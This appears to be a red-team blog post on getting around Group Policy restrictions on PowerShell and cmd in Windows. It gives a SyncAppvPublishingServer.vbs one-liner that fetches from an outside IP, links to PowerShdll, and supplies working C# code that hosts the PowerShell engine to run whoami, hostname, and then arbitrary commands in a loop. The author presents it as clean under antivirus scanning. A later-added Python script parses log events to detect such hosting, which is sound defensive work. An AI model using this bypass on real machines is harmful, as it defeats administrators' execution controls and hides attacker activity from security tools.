How I bypassed Local Group Policy and Domain Group Policy (Powershell Restriction)

Introduction:

Hello all, back with another post, but first it's story time. A few months ago my colleague and I were talking about different red team scenarios, and one of the scenarios we made up was: what would we do in an environment where there's no PowerShell or cmd available? There must be a way to get around it.

First things first, let's disable PowerShell as well as cmd:

Go to the Start button and type "edit group policy".

Then go to User Configuration -> Administrative Templates -> System -> Prevent access to the command prompt

and for PowerShell:

User Configuration -> Administrative Templates -> System -> Don't run specified Windows applications, and add powershell.exe to the list.

Let's verify whether cmd and PowerShell are restricted or not:

Workarounds From The Internet:

We started working on a solution and found a few different solutions online, which are listed below:

Using PowerShdll:

https://github.com/p3nt4/PowerShdll


Using SyncAppvPublishingServer:

SyncAppvPublishingServer.vbs "echo ''; iwr http://192.168.11.21:4446"

There are a few more programs that can help in using PowerShell without powershell.exe. I won't go over all of them; here is a really awesome blog covering a few of the programs:

My Own Solution:

There were two problems with the above programs. First, most of the programs listed above were being caught by the AV, and in an enterprise environment that could cost you the whole activity. Second, I was not actually satisfied; I wanted something different, something other than this. I wanted to build my own solution, so I started researching PowerShell and how it actually initializes. I came across the Microsoft documentation, and it had the answer for me.

System.Management.Automation.dll contains the PowerShell class, and anyone can instantiate that class directly from the DLL and execute commands using any programming language that can load it. I decided to test this out using C#. I am using Visual Studio Code, and I will demonstrate a simple program that executes a PowerShell command even when PowerShell is restricted by Local Group Policy.

I wrote a small program that executes the whoami and hostname commands:


using System;
using System.Management.Automation;
using System.Collections.ObjectModel;

namespace Testing
{
    class Program
    {
        static void Main(string[] args)
        {
            // Host the PowerShell engine inside this process; powershell.exe is never launched.
            PowerShell ps = PowerShell.Create();
            string command;
            Collection<PSObject> PSOutput;

            // Hard-coded script; Invoke() runs it and returns the output objects.
            command = "whoami; hostname";
            PSOutput = ps.AddScript(command).Invoke();

            for (int i = 0; i < PSOutput.Count; i++)
            {
                Console.WriteLine(PSOutput[i].ToString());
            }
            // Keep the console window open until Enter is pressed.
            Console.ReadLine();
        }
    }
}

What the above program does: first it initializes a PowerShell instance; I have hard-coded the commands "whoami" and "hostname"; it then invokes them, stores the result in the PSOutput collection, and the for loop prints the collection's values. Compile the program with csc.exe and execute it:

csc.exe /reference:"C:\Program Files (x86)\Reference Assemblies\Microsoft\WindowsPowerShell\3.0\System.Management.Automation.dll" powershell.cs /out:test.exe


After compiling we will have the exe file; executing it gives us the command output:

And there we have it: we executed a PowerShell command without powershell.exe, thus bypassing the Local Group Policy. There are a lot of different techniques that could be used; for example, we can rename powershell.exe to something else and it will run, or you can simply use a C2 agent to execute the commands. Most of the programs mentioned above will be detected by the AV; as far as this solution is concerned, I have scanned this program with antiscan.me and it was clean. This solution is also applicable to Active Directory environments (Domain Group Policy).
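On the defensive side, an added example that is not part of the original post: the "Don't run specified Windows applications" policy only matches the executable name, but the engine hosted inside test.exe still writes engine lifecycle events (ID 400 started / 403 stopped in the Windows PowerShell log) whose HostApplication field names the hosting process, so a log review can spot PowerShell running outside the usual hosts. The Python below parses constructed sample messages (not real log exports) and flags engines hosted by anything outside an assumed KNOWN_HOSTS list; the sample paths are made up.

```python
import re

# Engine lifecycle events (ID 400 started / 403 stopped) in the "Windows PowerShell"
# log carry key=value lines; HostApplication is the hosting process's command line.
FIELD_RE = re.compile(r"^\s*(\w+)=(.*)$", re.MULTILINE)

# Assumption: only these executables are expected to host PowerShell on the box.
KNOWN_HOSTS = {"powershell.exe", "powershell_ise.exe", "pwsh.exe"}

def parse_engine_event(message):
    """Turn the key=value lines of an engine event message into a dict."""
    return {key: value.strip() for key, value in FIELD_RE.findall(message)}

def host_executable(host_application):
    """Lower-cased executable name from a HostApplication command line."""
    host_application = host_application.strip()
    if host_application.startswith('"'):  # quoted path, may contain spaces
        end = host_application.find('"', 1)
        path = host_application[1:end] if end > 0 else host_application[1:]
    else:
        path = host_application.split(" ", 1)[0]
    return re.split(r"[\\/]", path)[-1].lower()

def classify(event):
    """(executable, HostName) when the engine ran in an unexpected host, else None."""
    exe = host_executable(event.get("HostApplication", ""))
    if not exe or exe in KNOWN_HOSTS:
        return None
    return exe, event.get("HostName", "?")

def find_unmanaged_hosts(messages):
    return [hit for m in messages if (hit := classify(parse_engine_event(m)))]

# Constructed sample messages, not real log exports: an interactive console,
# then an engine started inside a user's own executable as in this post.
SAMPLE_EVENTS = [
    r"""Details:
    NewEngineState=Available
    HostName=ConsoleHost
    HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile""",
    r"""Details:
    NewEngineState=Available
    HostName=Default Host
    HostApplication=C:\Users\alice\Desktop\test.exe""",
]

if __name__ == "__main__":
    for exe, host in find_unmanaged_hosts(SAMPLE_EVENTS):
        print("review: PowerShell engine hosted by %s (HostName=%s)" % (exe, host))
```

Script block logging (event 4104 in Microsoft-Windows-PowerShell/Operational) records the script text itself regardless of which process hosts the engine, so the two checks complement each other.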

We can change the program to take input and execute the command:

using System;
using System.Management.Automation;
using System.Collections.ObjectModel;

namespace Testing
{
    class Program
    {
        static void Main(string[] args)
        {
            // One in-process PowerShell instance, reused for every command.
            PowerShell ps = PowerShell.Create();
            string command;
            Collection<PSObject> PSOutput;

            while (true)
            {
                command = Console.ReadLine();
                // Stop on "exit" or when stdin is closed (ReadLine returns null),
                // checked before invoking so "exit" is never run as a script.
                if (command == null || command == "exit")
                {
                    break;
                }

                // AddScript appends to the instance's pipeline; clear the previous
                // command and its streams first, otherwise every earlier command runs again.
                ps.Commands.Clear();
                ps.Streams.ClearStreams();
                try
                {
                    PSOutput = ps.AddScript(command).Invoke();
                }
                catch (RuntimeException e)
                {
                    // A terminating error throws instead of returning output.
                    Console.WriteLine("Error: " + e.Message);
                    continue;
                }

                for (int i = 0; i < PSOutput.Count; i++)
                {
                    Console.WriteLine(PSOutput[i].ToString());
                }
                // Non-terminating errors land in the error stream, not in the output.
                foreach (ErrorRecord err in ps.Streams.Error)
                {
                    Console.WriteLine("Error: " + err.ToString());
                }
            }
            // Keep the console window open until Enter is pressed.
            Console.ReadLine();
        }
    }
}

It's a very simple and dirty solution, but it can get the job done. I'll leave it for others to play with.

Happy Hacking
Nayani.